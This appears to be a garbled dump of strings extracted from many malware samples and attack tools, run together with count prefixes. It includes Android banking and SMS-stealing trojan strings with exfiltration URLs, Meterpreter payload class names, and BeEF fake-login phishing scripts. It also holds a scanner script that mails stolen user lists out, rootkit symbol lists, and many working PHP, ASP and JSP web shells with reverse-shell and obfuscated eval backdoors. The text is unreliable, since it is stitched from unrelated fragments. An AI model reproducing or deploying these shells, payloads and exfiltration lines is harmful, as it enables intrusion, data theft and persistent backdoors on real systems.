nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 mail-news.eicp.netcmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %srundll32.exe \"%s\", runmebydll32e
1 begin===tfud#of_com4mail_file#
1 lockittight agent monitorlockittight enginelockittight monitorlastclearingloglastlogsendtimestealthuninstallenablekeyloggingsnapshootsintervalsendlogperiodsendlogsmtpsendlogsmtpportsendlogsizesendlogloginpassclearlogsdaysclearlogsmailed oneshell tuhaoisrighto
1 need a girl to love qq 65665651 email master#h4cker.us [ ] spawning half a shell...set fso=server.createobject(\"scr\"&\"ipt\"&\"ing\"&\".\"&\"fil\"&\"esy\"&\"ste\"&\"mob\"&\"jec\"&\"t\")checkdirisokwritecheckdirisokdelbianlia
1 ]\\appdata\\roaming\\lsacs.exeupdateinterval=cardinterval={[!17!]}{[!18!]}uniqyeidclaxemainhttp://%s/cdosys.php\\the hook\\release\\the hook.pdb\\\\.\\mailslot\\logccget /%s?encoding=%c&t=%c&cc=%i64d&process=d
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 rpx 1.obfuscated with dotfuscatorthis is a compiled autoit script. av researchers please email avsupport@autoitscript.com for support.tagg
1 connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 %d of %d target%s%scompleted, %lu valid password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 ersingscandelete-tcbtime-wait1last-aclosing!fin!syn-receiv%cget %s 's password error!software\\microsoft\\active setup\\installed components\\{e3df6b419d1f}<start application 2 key><start application 1 key><select media key><start mail key><play/pause media key>0
1 s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 .iiswebvirtualdirroot[host ] [user ] [pass ] .anonymoususername.anonymoususerpassthe_white_lf_x@hotmail.comautogeneratecolumns=\"false\" onitemcommand=\"filesystem_itemcommand\"<asp:linkbutton id=\"lnkexec\" runat=\"server\" onclick=\"lnkexec_click\">[execute<asp:label id=\"uip\" runat=\"server\" text=\"your ip :\" forecolor=\"#ff8300\"></asp:label>autorun.infravmon.exelasttimekey.inicsdownupdatecsdownversioncsdownloadcsexit
2 -------- e-mail: zalexf@hotmail.ru ---------
1 binbuckset_accountset_passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
1 e-mail: cracker_prince@163.com.\\trackid log\\%s.txtcoded by princetrackid.dll%08x -- %slon\\od\\o-\\o)\\o%\\o!\\o=\\o9\\o5\\o1\\o%s%08x.001b
1 trm_hookcallback(non-win32 .exe or error in .exe image).pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
1 email: wfs#encryptpe.com
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && 